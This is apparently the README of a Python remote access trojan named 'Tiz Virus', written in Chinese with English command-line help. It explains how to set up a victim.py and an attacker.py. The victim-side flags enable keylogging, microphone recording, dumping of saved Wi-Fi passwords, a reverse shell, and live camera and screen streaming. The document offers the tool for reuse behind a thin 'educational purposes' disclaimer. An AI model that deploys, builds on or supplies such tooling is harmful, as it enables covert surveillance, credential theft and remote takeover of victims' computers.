python rat
1.0.0
此应用程序用于教育目的。对于任何滥用我的代码的行为,我不承担任何责任。
pip3 install requirements.txt
在Windows上,您可以启动victim_requirements.bat和/或attacker_requirements.bat来下载要求
注意攻击者和受害者的要求不同
在受害者计算机上: python3 victim.py
在攻击者计算机上: python3 attacker.py
受害方:
usage : victim . py [ - h ] [ - - host HOST ] [ - - port PORT ] [ - - keylog KEYLOG ] [ - - micro MICRO ] [ - - wifi WIFI ] [ - - shell SHELL ]
[ - - camera CAMERA ] [ - - screen SCREEN ]
Tiz Virus Victim
optional arguments :
- h , - - help show this help message and exit
- - host HOST listening ip , default is '0.0.0.0' , no need to change
- - port PORT default port is 5000 , revershell = port , camera stream = port + 1 , screen stream = port + 2
- - keylog KEYLOG keylog = t create a keylogger file / keylog = f don ' t create the file
- - micro MICRO micro = 10 record the microphone during 10 sec and put it in a file / micro = 0 don ' t record
- - wifi WIFI wifi = t create a file with all wifis password / wifi = f don ' t create the file
- - shell SHELL shell = t revershell on port ( default = 5000 ) / shell = f don ' t revershell
- - camera CAMERA camera = t stream camera on port + 1 ( default = 5001 ) / camera = f don ' t stream
- - screen SCREEN screen = t stream screen on port + 2 ( default = 5002 ) / screen = f don ' t stream
攻击方:
usage : attacker . py [ - h ] [ - - host HOST ] [ - - port PORT ] [ - - shell SHELL ] [ - - camera CAMERA ] [ - - screen SCREEN ]
Tiz Virus Attacker
optional arguments :
- h , - - help show this help message and exit
- - host HOST connecting ip , default is localhost '
- - port PORT default port is 5000 , revershell = port , camera stream = port + 1 , screen stream = port + 2
- - shell SHELL shell = t revershell on port ( default = 5000 ) / shell = f don ' t revershell
- - camera CAMERA camera = t stream camera on port + 1 ( default = 5001 ) / camera = f don ' t stream
- - screen SCREEN screen = t stream screen on port + 2 ( default = 5002 ) / screen = f don ' t stream
我什么都不是。使用这段代码,改进它,修改它。你不需要引用任何人的话。